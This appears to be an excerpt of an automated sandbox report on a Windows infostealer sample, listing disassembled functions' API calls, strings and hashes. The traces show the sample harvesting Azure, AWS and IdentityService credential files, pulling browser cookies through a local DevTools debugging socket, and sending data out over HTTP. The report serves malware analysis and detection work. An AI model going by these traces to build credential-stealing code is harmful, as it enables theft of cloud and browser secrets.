                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048508E1
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048508F9
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 04850911
                                              • lstrcat.KERNEL32(?,00421744), ref: 04850929
                                              • lstrcat.KERNEL32(?,00421758), ref: 04850938
                                              • lstrcat.KERNEL32(?,00421768), ref: 04850947
                                              • lstrcat.KERNEL32(?,00000000), ref: 0485095A
                                              • lstrcat.KERNEL32(?,00421770), ref: 04850969
                                              • lstrcat.KERNEL32(?,00000000), ref: 0485097C
                                              • lstrcat.KERNEL32(?,00421774), ref: 0485098B
                                              • lstrcat.KERNEL32(?,00421778), ref: 0485099A
                                              • lstrcat.KERNEL32(?,00000000), ref: 048509AD
                                              • lstrcat.KERNEL32(?,00421780), ref: 048509BC
                                              • lstrcat.KERNEL32(?,00421784), ref: 048509CB
                                              • lstrcat.KERNEL32(?,00000000), ref: 048509DE
                                              • lstrcat.KERNEL32(?,00421790), ref: 048509ED
                                              • lstrcat.KERNEL32(?,00421794), ref: 048509FC
                                              • strtok_s.MSVCRT ref: 04850A40
                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 04850A55
                                              • memset.MSVCRT ref: 04850AA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                              • String ID:
                                              • API String ID: 3689735781-0
                                              • Opcode ID: 098dc5743905a2ee9813f64f0b56af725ff5a500f78c5c8fd9e9f659a4e17eb6
                                              • Instruction ID: 570783ca4e14e43d088714e6fc1e019087b5e3383ee17e700d1a8368f21a596d
                                              • Opcode Fuzzy Hash: 098dc5743905a2ee9813f64f0b56af725ff5a500f78c5c8fd9e9f659a4e17eb6
                                              • Instruction Fuzzy Hash: C6D13271D01218ABDB08FBE4DD85EEE7739AF54305F504B59E902E60A0EBB4BA48CB51
                                              Function 004059B0 Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 493networkstringmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405A48
                                              • StrCmpCA.SHLWAPI(?,02C9ED80), ref: 00405A63
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405BE3
                                              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,02CA73A8,00000000,?,02CA0838,00000000,?,00421B4C), ref: 00405EC1
                                              • lstrlenA.KERNEL32(00000000), ref: 00405ED2
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00405EE3
                                              • HeapAlloc.KERNEL32(00000000), ref: 00405EEA
                                              • lstrlenA.KERNEL32(00000000), ref: 00405EFF
                                              • memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
                                              • lstrlenA.KERNEL32(00000000), ref: 00405F28
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405F41
                                              • memcpy.MSVCRT(?), ref: 00405F4E
                                              • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F6B
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F7F
                                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F9C
                                              • InternetCloseHandle.WININET(00000000), ref: 00406000
                                              • InternetCloseHandle.WININET(00000000), ref: 0040600D
                                              • HttpOpenRequestA.WININET(00000000,02CA7328,?,02CA65B8,00000000,00000000,00400100,00000000), ref: 00405C48
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • InternetCloseHandle.WININET(00000000), ref: 00406017
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                              • String ID: "$"$------$------$------$S`A$S`A
                                              • API String ID: 1406981993-1449208648
                                              • Opcode ID: ece7f536badaabeff24f30454e587c13eb1b05989c193d290bb1a0ec0f220d4a
                                              • Instruction ID: 528bda5bfb4e43d7cafc1c43cb8ffcda3f2e6465d8e228b0a039cdd5195e34d5
                                              • Opcode Fuzzy Hash: ece7f536badaabeff24f30454e587c13eb1b05989c193d290bb1a0ec0f220d4a
                                              • Instruction Fuzzy Hash: 1412FC71925128ABCB14EBA1DCA5FEEB379BF14714F00419EF10662091EF783B98CB59
                                              Function 00414FC0 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 119stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 00414FD7
                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                              • lstrcatA.KERNEL32(?,00000000), ref: 00415000
                                              • lstrcatA.KERNEL32(?,\.azure\), ref: 0041501D
                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                                • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                              • memset.MSVCRT ref: 00415063
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0041508C
                                              • lstrcatA.KERNEL32(?,\.aws\), ref: 004150A9
                                                • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                                • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                                • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                                • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                              • memset.MSVCRT ref: 004150EF
                                              • lstrcatA.KERNEL32(?,00000000), ref: 00415118
                                              • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00415135
                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
                                                • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
                                                • Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,02C9ED50,?,000003E8), ref: 00414C9A
                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
                                                • Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
                                                • Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81
                                              • memset.MSVCRT ref: 0041517B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                              • API String ID: 4017274736-974132213
                                              • Opcode ID: 08139e44e5d7f232419ca54b84d5d6bd78c899cf797d15b4c3395f2c57b04096
                                              • Instruction ID: 39229561bcf9e6d20be1630849a4938ad9d2aa6361ec20f439e2b4dca26d7b75
                                              • Opcode Fuzzy Hash: 08139e44e5d7f232419ca54b84d5d6bd78c899cf797d15b4c3395f2c57b04096
                                              • Instruction Fuzzy Hash: 3F41D6B5E4021867DB10F770EC4BFDD33385B60705F40485AB649660D2FEB8A7D88B9A
                                              Function 0040CFF0 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02CA08F8,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D083
                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D1C7
                                              • HeapAlloc.KERNEL32(00000000), ref: 0040D1CE
                                              • lstrcatA.KERNEL32(?,00000000,02C9EE20,0042156C,02C9EE20,00421568,00000000), ref: 0040D308
                                              • lstrcatA.KERNEL32(?,00421570), ref: 0040D317
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D32A
                                              • lstrcatA.KERNEL32(?,00421574), ref: 0040D339
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D34C
                                              • lstrcatA.KERNEL32(?,00421578), ref: 0040D35B
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D36E
                                              • lstrcatA.KERNEL32(?,0042157C), ref: 0040D37D
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D390
                                              • lstrcatA.KERNEL32(?,00421580), ref: 0040D39F
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D3B2
                                              • lstrcatA.KERNEL32(?,00421584), ref: 0040D3C1
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D3D4
                                              • lstrcatA.KERNEL32(?,00421588), ref: 0040D3E3
                                                • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02C9D528,?,004210F4,?,00000000), ref: 0041AB3B
                                                • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                              • lstrlenA.KERNEL32(?), ref: 0040D42A
                                              • lstrlenA.KERNEL32(?), ref: 0040D439
                                              • memset.MSVCRT ref: 0040D488
                                                • Part of subcall function 0041AD80: StrCmpCA.SHLWAPI(00000000,00421568,0040D2A2,00421568,00000000), ref: 0041AD9F
                                              • DeleteFileA.KERNEL32(00000000), ref: 0040D4B4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                              • String ID:
                                              • API String ID: 2775534915-0
                                              • Opcode ID: 35fedd2b9296ef60e5301991e76848098ada1adc0417fc27961a00cc535ec500
                                              • Instruction ID: 090733d9ad632ec07999f14fc915118f0ed2ae89bdc12e1fab3d18f5c5045e08
                                              • Opcode Fuzzy Hash: 35fedd2b9296ef60e5301991e76848098ada1adc0417fc27961a00cc535ec500
                                              • Instruction Fuzzy Hash: 35E17571E15114ABCB04EBA1ED56EEE7339AF14305F10415EF106760A1EF38BB98CB6A
                                              Function 0484D257 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 04858F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,04841660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 04858F7D
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0484D2EA
                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0484D42E
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0484D435
                                              • lstrcat.KERNEL32(?,00000000), ref: 0484D56F
                                              • lstrcat.KERNEL32(?,00421570), ref: 0484D57E
                                              • lstrcat.KERNEL32(?,00000000), ref: 0484D591
                                              • lstrcat.KERNEL32(?,00421574), ref: 0484D5A0
                                              • lstrcat.KERNEL32(?,00000000), ref: 0484D5B3
                                              • lstrcat.KERNEL32(?,00421578), ref: 0484D5C2
                                              • lstrcat.KERNEL32(?,00000000), ref: 0484D5D5
                                              • lstrcat.KERNEL32(?,0042157C), ref: 0484D5E4
                                              • lstrcat.KERNEL32(?,00000000), ref: 0484D5F7
                                              • lstrcat.KERNEL32(?,00421580), ref: 0484D606
                                              • lstrcat.KERNEL32(?,00000000), ref: 0484D619
                                              • lstrcat.KERNEL32(?,00421584), ref: 0484D628
                                              • lstrcat.KERNEL32(?,00000000), ref: 0484D63B
                                              • lstrcat.KERNEL32(?,00421588), ref: 0484D64A
                                                • Part of subcall function 0485AD97: lstrlen.KERNEL32(048451BC,?,?,048451BC,00420DDF), ref: 0485ADA2
                                                • Part of subcall function 0485AD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 0485ADFC
                                              • lstrlen.KERNEL32(?), ref: 0484D691
                                              • lstrlen.KERNEL32(?), ref: 0484D6A0
                                              • memset.MSVCRT ref: 0484D6EF
                                                • Part of subcall function 0485AFE7: StrCmpCA.SHLWAPI(00000000,00421568,0484D509,00421568,00000000), ref: 0485B006
                                              • DeleteFileA.KERNEL32(00000000), ref: 0484D71B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                              • String ID:
                                              • API String ID: 1973479514-0
                                              • Opcode ID: 61858acd6518aa59b0545b41e6e8699b4742c055ec598c9622ee146424d88619
                                              • Instruction ID: 0970a2e3a42e78cd6e937ff4bb9e54a8eef474d33016e68b38da469f5339599b
                                              • Opcode Fuzzy Hash: 61858acd6518aa59b0545b41e6e8699b4742c055ec598c9622ee146424d88619
                                              • Instruction Fuzzy Hash: 68E12071D00118ABDB08FBA4DD94EEE7339AF54305F504B59F906E60B0EE75BA48CB62
                                              Function 00409BE0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 141stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00409A50: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
                                              • memset.MSVCRT ref: 00409C33
                                              • lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 00409C48
                                              • lstrcatA.KERNEL32(?,00000000), ref: 00409C5E
                                              • memset.MSVCRT ref: 00409C9A
                                              • lstrcatA.KERNEL32(?,cookies), ref: 00409CAF
                                              • lstrcatA.KERNEL32(?,004212C4), ref: 00409CC1
                                              • lstrcatA.KERNEL32(?,?), ref: 00409CD5
                                              • lstrcatA.KERNEL32(?,004212C8), ref: 00409CE7
                                              • lstrcatA.KERNEL32(?,?), ref: 00409CFB
                                              • lstrcatA.KERNEL32(?,.txt), ref: 00409D0D
                                              • lstrlenA.KERNEL32(00000000), ref: 00409D17
                                              • lstrlenA.KERNEL32(00000000), ref: 00409D26
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • memset.MSVCRT ref: 00409D7E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$memset$lstrlen$InternetOpenlstrcpy
                                              • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                              • API String ID: 689835475-3542011879
                                              • Opcode ID: 8fe7c3fcfe360faa22593f97e4113398223892f47f8f887075de07db9a8ee46e
                                              • Instruction ID: dd0e0b2e904cac6dcb4644251d8498bdcd69e700431b121c7f08c254ac6fdba9
                                              • Opcode Fuzzy Hash: 8fe7c3fcfe360faa22593f97e4113398223892f47f8f887075de07db9a8ee46e
                                              • Instruction Fuzzy Hash: 97517E71D10518ABCB14EBE0EC55FEE7738AF14306F40456AF106A70D1EB78AA48CF69
                                              Function 04845C17 Relevance: 29.0, APIs: 19, Instructions: 493networkstringmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AA1
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AB8
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844ACF
                                                • Part of subcall function 04844A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 04844AF0
                                                • Part of subcall function 04844A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 04844B00
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 04845CAF
                                              • StrCmpCA.SHLWAPI(?,006D6E80), ref: 04845CCA
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 04845E4A
                                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421B50,00000000,?,006D6AF0,00000000,?,006D6CF0,00000000,?,00421B4C), ref: 04846128
                                              • lstrlen.KERNEL32(00000000), ref: 04846139
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0484614A
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04846151
                                              • lstrlen.KERNEL32(00000000), ref: 04846166
                                              • memcpy.MSVCRT(?,00000000,00000000), ref: 0484617D
                                              • lstrlen.KERNEL32(00000000), ref: 0484618F
                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 048461A8
                                              • memcpy.MSVCRT(?), ref: 048461B5
                                              • lstrlen.KERNEL32(00000000,?,?), ref: 048461D2
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 048461E6
                                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 04846203
                                              • InternetCloseHandle.WININET(00000000), ref: 04846267
                                              • InternetCloseHandle.WININET(00000000), ref: 04846274
                                              • HttpOpenRequestA.WININET(00000000,006D6E9C,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 04845EAF
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                              • InternetCloseHandle.WININET(00000000), ref: 0484627E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                              • String ID:
                                              • API String ID: 1703137719-0
                                              • Opcode ID: 2a3c1412926e8dcb65fac1fead3eb2460a9c625ebd483e9c6d5746682fc61762
                                              • Instruction ID: 8c301d54101a98880f8b36054055c20d35f127d978703c8f7ac7789af5983427
                                              • Opcode Fuzzy Hash: 2a3c1412926e8dcb65fac1fead3eb2460a9c625ebd483e9c6d5746682fc61762
                                              • Instruction Fuzzy Hash: E212DD71D10128ABDB59FBA4DC94FEEB379BF54705F404B99A506A20A0EFB03A48CF51
                                              Function 0040CA90 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,02CA5628,00000000,?,00421544,00000000,?,?), ref: 0040CB6C
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CB89
                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CB95
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CBA8
                                              • ??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CBB5
                                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CBD9
                                              • StrStrA.SHLWAPI(?,02CA5640,00420B56), ref: 0040CBF7
                                              • StrStrA.SHLWAPI(00000000,02CA5808), ref: 0040CC1E
                                              • StrStrA.SHLWAPI(?,02CA5F30,00000000,?,00421550,00000000,?,00000000,00000000,?,02C9EFB0,00000000,?,0042154C,00000000,?), ref: 0040CDA2
                                              • StrStrA.SHLWAPI(00000000,02CA5EB0), ref: 0040CDB9
                                                • Part of subcall function 0040C920: memset.MSVCRT ref: 0040C953
                                                • Part of subcall function 0040C920: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02C9EDF0), ref: 0040C971
                                                • Part of subcall function 0040C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
                                                • Part of subcall function 0040C920: memcpy.MSVCRT(?,?,?), ref: 0040CA12
                                              • StrStrA.SHLWAPI(?,02CA5EB0,00000000,?,00421554,00000000,?,00000000,02C9EDF0), ref: 0040CE5A
                                              • StrStrA.SHLWAPI(00000000,02C9EDD0), ref: 0040CE71
                                                • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
                                                • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
                                                • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78
                                              • lstrlenA.KERNEL32(00000000), ref: 0040CF44
                                              • CloseHandle.KERNEL32(00000000), ref: 0040CF9C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                              • String ID:
                                              • API String ID: 1564132460-3916222277
